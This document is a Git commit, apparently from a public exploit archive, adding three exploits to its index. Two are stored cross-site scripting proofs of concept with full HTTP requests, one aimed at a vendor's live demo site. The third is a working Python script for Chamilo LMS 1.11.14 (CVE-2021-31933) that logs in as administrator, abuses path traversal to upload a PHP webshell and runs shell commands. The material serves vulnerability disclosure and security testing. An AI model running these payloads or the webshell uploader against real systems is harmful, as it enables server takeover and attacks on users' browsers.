DB: 2021-05-15

3 changes to exploits/shellcodes Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated) Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS) Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
stayyule · May 15, 2021 · 8845e34 · 8845e34
1 parent 18260aa
commit 8845e34
Show file tree

Hide file tree

Showing 4 changed files with 215 additions and 0 deletions.
diff --git a/exploits/php/webapps/49865.txt b/exploits/php/webapps/49865.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)
+# Date: 2021-05-13
+# Exploit Author: mohsen khashei (kh4sh3i) or [email protected]
+# Vendor Homepage: https://github.com/amirhamza05/Student-Management-System
+# Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip
+# Version: 1.0
+# Tested on: ubuntu 20.04.2
+
+# --- Description --- #
+
+# The web application allows for an  Attacker to inject persistent Cross-Site-Scripting payload in Live Chat. 
+
+
+# --- Proof of concept --- #
+
+1- Login to Student Management System
+2- Click on Live Chat button
+3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image>
+5- Xss popup will be triggered.
+
+
+# --- Malicious Request --- #
+
+POST /nav_bar_action.php HTTP/1.1
+Host: (HOST)
+Cookie: (PHPSESSID)
+Content-Length: 96
+
+send_message_chat%5Bmessage%5D=<image src=1 onerror="javascript:alert(document.domain)"></image>
diff --git a/exploits/php/webapps/49866.txt b/exploits/php/webapps/49866.txt
@@ -0,0 +1,112 @@
+# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
+# Date: 13/05/2021
+# Exploit Author: Ayşenur KARAASLAN
+# Vendor Homepage: https://podcastgenerator.net/demoV2/
+# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
+# Version: < 3.1.1
+# CVE: N/A
+
+Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.
+
+#Description
+The following is PoC to use the XSS bug with unauthorized user.
+
+1. Login to your admin account.
+2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered.  It is possible to place JavaScript code.
+3. Click the Home button
+4. Click "More" button of created or edited episode.
+
+# Vulnerable Parameter Type: POST
+# Vulnerable Parameter: long_description
+# Attack Pattern: <script>prompt("Aysenur-PoC")</script>
+
+#PoC
+HTTP Request:
+
+POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
+Host: podcastgenerator.net
+Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;
+_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
+Content-Length: 1590
+Cache-Control: max-age=0
+Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
+Sec-Ch-Ua-Mobile: ?0
+Upgrade-Insecure-Requests: 1
+Origin: https://podcastgenerator.net
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: frame
+Referer:
+https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="userfile"
+
+aysenurxss-poc.jpg
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="title"
+
+Aysenur-PoC
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="description"
+
+poc
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="countdown"
+
+255
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="category[]"
+
+about
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Day"
+
+13
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Month"
+
+5
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Year"
+
+2021
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Hour"
+
+14
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="Minute"
+
+29
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="long_description"
+
+<script>prompt("aysenur-xss")</script>
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="keywords"
+
+poc
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="explicit"
+
+no
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="auth_name"
+
+aysenur
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
+Content-Disposition: form-data; name="auth_email"
+
+[email protected]
+------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--
diff --git a/exploits/php/webapps/49867.py b/exploits/php/webapps/49867.py
@@ -0,0 +1,71 @@
+# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
+# Date: 13/05/2021
+# Exploit Author: M. Cory Billington (@_th3y)
+# Vendor Homepage: https://chamilo.org
+# Software Link: https://github.com/chamilo/chamilo-lms
+# Version: 1.11.14
+# Tested on: Ubuntu 20.04.2 LTS
+# CVE: CVE-2021-31933
+# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/
+
+from requests import Session
+from random import choice
+from string import ascii_lowercase
+
+import requests
+
+# This is all configuration stuff, 
+url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
+user_name = "admin"  # User must be an administrator
+password = "admin"
+command = "id;whoami"
+
+# Where you want to upload your webshell. Must be writable by web server user.
+# This spot isn't protectec by .htaccess
+webshell_path = 'web/' 
+webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
+content = f"<?php echo `{command}`; ?>" 
+
+def main():
+    # Run a context manager with a session object to hold login session after login
+    with Session() as s:
+        login_url = f"{url}index.php"
+        login_data = {
+            "login": user_name,
+            "password": password
+        }
+        r = s.post(login_url, data=login_data) # login request
+
+        # Check to see if login as admin user was successful.
+        if "admin" not in r.url:
+            print(f"[-] Login as {user_name} failed. Need to be admin")
+            return
+        print(f"[+] Logged in as {user_name}")
+        print(f"[+] Cookie: {s.cookies}")
+        file_upload_url = f"{url}main/upload/upload.php"
+        # The 'curdirpath' is not santitized, so I traverse to  the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
+        php_webshell_file = {
+            "curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
+            "user_upload": (webshell_name, content)
+            }
+
+        ## Good command if you want to see what the request looks like without sending
+        # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))
+
+        # Two requests required to actually upload the file
+        for i in range(2):
+            s.post(file_upload_url, files=php_webshell_file)
+
+        exploit_request_url = f"{url}{webshell_path}{webshell_name}"
+        print("[+] Upload complete!")
+        print(f"[+] Webshell: {exploit_request_url}")
+
+        # This is a GET request to the new webshell to trigger code execution
+        command_output = s.get(exploit_request_url)
+        print("[+] Command output:\n")
+        print(command_output.text)
+
+
+
+if __name__ == "__main__":
+    main()
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -44030,3 +44030,6 @@ id,file,description,date,author,type,platform,port
 49860,exploits/php/webapps/49860.txt,"Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)",2021-05-13,"Mesut Cetin",webapps,php,
 49861,exploits/php/webapps/49861.txt,"Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection (Authenticated)",2021-05-13,"Mesut Cetin",webapps,php,
 49862,exploits/linux/webapps/49862.py,"ZeroShell 3.9.0 - Remote Command Execution",2021-05-13,"Fellipe Oliveira",webapps,linux,
+49865,exploits/php/webapps/49865.txt,"Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)",2021-05-14,"mohsen khashei",webapps,php,
+49866,exploits/php/webapps/49866.txt,"Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)",2021-05-14,"Ayşenur KARAASLAN",webapps,php,
+49867,exploits/php/webapps/49867.py,"Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)",2021-05-14,"M. Cory Billington",webapps,php,